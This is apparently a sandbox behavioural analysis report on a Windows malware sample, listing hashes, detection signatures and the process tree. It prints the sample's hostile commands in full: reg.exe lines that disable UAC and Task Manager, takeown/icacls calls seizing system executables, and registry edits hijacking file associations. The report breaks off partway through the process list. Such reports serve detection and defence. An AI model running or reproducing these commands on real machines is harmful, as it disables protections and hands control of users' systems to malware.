Analysis
-
max time kernel
120s -
max time network
92s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
02-10-2024 21:32
Static task
static1
Behavioral task
behavioral1
Sample
2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe
Resource
win10v2004-20240802-en
General
-
Target
2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe
-
Size
514KB
-
MD5
65c713d83b613d647d369ed305632930
-
SHA1
eb79bea11c59b78498dbf65679ba1a24203e8d9e
-
SHA256
2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878f
-
SHA512
26d9af89110278380c85c8193d44ac1002e4df88dfce7312402f2bd6b6e610e92559600a71068c54a17598429f55a36cc69998cb210f6ceb964d5f53f31032b5
-
SSDEEP
6144:/pW2bgbbV28okoS1oWMkdlZQ5iinNrv26FYLIcw/3ScNAf3:/pW2IoioS6p7q
Malware Config
Signatures
-
Processes:
reg.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Disables Task Manager via registry modification
-
Possible privilege escalation attempt 64 IoCs
Processes:
icacls.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exepid Process 1408 icacls.exe 1652 icacls.exe 312 icacls.exe 1552 takeown.exe 1396 takeown.exe 1680 icacls.exe 3064 icacls.exe 1156 icacls.exe 4012 takeown.exe 692 icacls.exe 4020 takeown.exe 2560 takeown.exe 2528 takeown.exe 3488 takeown.exe 3028 takeown.exe 4292 icacls.exe 2112 icacls.exe 752 takeown.exe 3712 icacls.exe 4816 takeown.exe 3940 takeown.exe 3020 takeown.exe 4332 takeown.exe 1176 takeown.exe 4852 takeown.exe 976 takeown.exe 1784 icacls.exe 3712 icacls.exe 4272 takeown.exe 1516 takeown.exe 1552 icacls.exe 4716 icacls.exe 1476 icacls.exe 2368 takeown.exe 2244 icacls.exe 872 takeown.exe 3432 takeown.exe 3880 icacls.exe 2088 takeown.exe 1244 takeown.exe 2484 takeown.exe 1188 takeown.exe 884 icacls.exe 2872 takeown.exe 2208 takeown.exe 3892 icacls.exe 3608 icacls.exe 868 icacls.exe 3160 takeown.exe 1588 takeown.exe 1780 icacls.exe 1680 takeown.exe 4592 takeown.exe 4424 takeown.exe 1032 takeown.exe 3080 takeown.exe 4804 icacls.exe 5100 icacls.exe 3104 takeown.exe 1920 takeown.exe 5048 takeown.exe 3548 takeown.exe 2536 icacls.exe 3004 takeown.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe -
Modifies file permissions 1 TTPs 64 IoCs
Processes:
icacls.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exepid Process 2192 icacls.exe 868 icacls.exe 1292 takeown.exe 2344 takeown.exe 612 icacls.exe 976 takeown.exe 4332 takeown.exe 1176 takeown.exe 3400 icacls.exe 2528 takeown.exe 5020 icacls.exe 1316 takeown.exe 1680 icacls.exe 692 icacls.exe 2484 takeown.exe 1780 icacls.exe 1336 icacls.exe 3548 takeown.exe 4380 takeown.exe 1156 icacls.exe 1784 icacls.exe 3104 takeown.exe 1476 icacls.exe 2220 takeown.exe 4816 takeown.exe 4852 icacls.exe 1772 takeown.exe 3704 takeown.exe 3312 takeown.exe 4804 icacls.exe 3940 takeown.exe 2148 icacls.exe 2380 takeown.exe 3712 icacls.exe 2444 icacls.exe 4644 icacls.exe 4756 icacls.exe 2372 takeown.exe 1308 icacls.exe 1516 icacls.exe 1552 icacls.exe 732 takeown.exe 3624 takeown.exe 4716 icacls.exe 2208 takeown.exe 3064 icacls.exe 1560 icacls.exe 872 takeown.exe 3260 icacls.exe 2872 takeown.exe 4572 icacls.exe 4676 takeown.exe 3892 icacls.exe 4280 takeown.exe 5032 icacls.exe 5060 takeown.exe 5000 takeown.exe 3160 takeown.exe 3956 icacls.exe 4864 takeown.exe 1548 takeown.exe 2728 icacls.exe 3004 takeown.exe 1556 icacls.exe -
Modifies system executable filetype association 2 TTPs 1 IoCs
Processes:
2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe BATCF %1" 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe -
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
-
Drops file in System32 directory 1 IoCs
Processes:
2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exedescription ioc Process File opened for modification C:\Windows\System32\winrs.exe 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 10 IoCs
Processes:
2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe NTPAD %1" 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\cmdfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe CMDSF %1" 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\VBSFile\Shell\Open\Command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe VBSSF %1" 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe HTMWF %1" 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe BATCF %1" 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\giffile\shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe JPGIF %1" 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\rtffile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe RTFDF %1" 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe NTPAD %1" 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inifile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe NTPAD %1" 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inffile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe NTPAD %1" 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe -
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 20 IoCs
Processes:
2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exepid Process 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exepid Process 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
Processes:
2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exedescription pid Process Token: SeDebugPrivilege 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe Token: SeTakeOwnershipPrivilege 1660 takeown.exe Token: SeTakeOwnershipPrivilege 2180 takeown.exe Token: SeTakeOwnershipPrivilege 1264 takeown.exe Token: SeTakeOwnershipPrivilege 3640 takeown.exe Token: SeTakeOwnershipPrivilege 3284 takeown.exe Token: SeTakeOwnershipPrivilege 3972 takeown.exe Token: SeTakeOwnershipPrivilege 748 takeown.exe Token: SeTakeOwnershipPrivilege 732 takeown.exe Token: SeTakeOwnershipPrivilege 3184 takeown.exe Token: SeTakeOwnershipPrivilege 1376 takeown.exe Token: SeTakeOwnershipPrivilege 2560 takeown.exe Token: SeTakeOwnershipPrivilege 3624 takeown.exe Token: SeTakeOwnershipPrivilege 3312 takeown.exe Token: SeTakeOwnershipPrivilege 3412 takeown.exe Token: SeTakeOwnershipPrivilege 4132 takeown.exe Token: SeTakeOwnershipPrivilege 2088 takeown.exe Token: SeTakeOwnershipPrivilege 4012 takeown.exe Token: SeTakeOwnershipPrivilege 3004 takeown.exe Token: SeTakeOwnershipPrivilege 848 takeown.exe Token: SeTakeOwnershipPrivilege 4728 takeown.exe Token: SeTakeOwnershipPrivilege 4676 takeown.exe Token: SeTakeOwnershipPrivilege 2484 takeown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exedescription pid Process procid_target PID 3612 wrote to memory of 2480 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 85 PID 3612 wrote to memory of 2480 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 85 PID 3612 wrote to memory of 3052 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 87 PID 3612 wrote to memory of 3052 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 87 PID 3612 wrote to memory of 1660 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 98 PID 3612 wrote to memory of 1660 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 98 PID 3612 wrote to memory of 824 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 100 PID 3612 wrote to memory of 824 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 100 PID 3612 wrote to memory of 2180 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 101 PID 3612 wrote to memory of 2180 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 101 PID 3612 wrote to memory of 2520 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 104 PID 3612 wrote to memory of 2520 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 104 PID 3612 wrote to memory of 1264 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 106 PID 3612 wrote to memory of 1264 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 106 PID 3612 wrote to memory of 4572 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 108 PID 3612 wrote to memory of 4572 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 108 PID 3612 wrote to memory of 3640 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 110 PID 3612 wrote to memory of 3640 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 110 PID 3612 wrote to memory of 4292 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 112 PID 3612 wrote to memory of 4292 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 112 PID 3612 wrote to memory of 3284 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 114 PID 3612 wrote to memory of 3284 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 114 PID 3612 wrote to memory of 4244 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 115 PID 3612 wrote to memory of 4244 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 115 PID 3612 wrote to memory of 3972 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 117 PID 3612 wrote to memory of 3972 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 117 PID 3612 wrote to memory of 2196 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 120 PID 3612 wrote to memory of 2196 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 120 PID 3612 wrote to memory of 748 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 122 PID 3612 wrote to memory of 748 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 122 PID 3612 wrote to memory of 708 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 124 PID 3612 wrote to memory of 708 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 124 PID 3612 wrote to memory of 732 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 126 PID 3612 wrote to memory of 732 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 126 PID 3612 wrote to memory of 3916 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 128 PID 3612 wrote to memory of 3916 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 128 PID 3612 wrote to memory of 3184 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 130 PID 3612 wrote to memory of 3184 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 130 PID 3612 wrote to memory of 2408 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 132 PID 3612 wrote to memory of 2408 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 132 PID 3612 wrote to memory of 1376 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 133 PID 3612 wrote to memory of 1376 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 133 PID 3612 wrote to memory of 692 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 134 PID 3612 wrote to memory of 692 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 134 PID 3612 wrote to memory of 3624 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 136 PID 3612 wrote to memory of 3624 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 136 PID 3612 wrote to memory of 1156 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 138 PID 3612 wrote to memory of 1156 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 138 PID 3612 wrote to memory of 3412 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 139 PID 3612 wrote to memory of 3412 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 139 PID 3612 wrote to memory of 5032 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 141 PID 3612 wrote to memory of 5032 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 141 PID 3612 wrote to memory of 2560 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 144 PID 3612 wrote to memory of 2560 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 144 PID 3612 wrote to memory of 3260 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 145 PID 3612 wrote to memory of 3260 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 145 PID 3612 wrote to memory of 3312 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 147 PID 3612 wrote to memory of 3312 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 147 PID 3612 wrote to memory of 5024 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 151 PID 3612 wrote to memory of 5024 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 151 PID 3612 wrote to memory of 4012 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 152 PID 3612 wrote to memory of 4012 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 152 PID 3612 wrote to memory of 4372 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 153 PID 3612 wrote to memory of 4372 3612 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 153
Processes
-
C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe"C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe"1⤵
- Checks computer location settings
- Modifies system executable filetype association
- Drops file in System32 directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3612 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f2⤵
- UAC bypass
- Modifies registry key
PID:2480
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
PID:3052
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\bfsvc.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1660
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\bfsvc.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:824
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\HelpPane.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2180
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\HelpPane.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2520
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\hh.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1264
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\hh.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:4572
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\splwow64.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3640
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\splwow64.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4292
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\winhlp32.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3284
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\winhlp32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4244
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\write.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3972
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\write.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2196
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\SysWOW64\raserver.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:748
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\raserver.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:708
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\SysWOW64\msra.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:732
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msra.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3916
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\SysWOW64\quickassist.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3184
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\quickassist.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2408
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\SysWOW64\sdchange.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1376
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdchange.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:692
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\SysWOW64\CameraSettingsUIHost.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3624
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\CameraSettingsUIHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1156
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\SysWOW64\logagent.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3412
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\logagent.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:5032
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\SysWOW64\rrinstaller.exe"2⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:2560
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\rrinstaller.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:3260
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\SysWOW64\gpscript.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3312
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\gpscript.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5024
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\SysWOW64\mavinject.exe"2⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:4012
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mavinject.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4372
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\SysWOW64\provlaunch.exe"2⤵
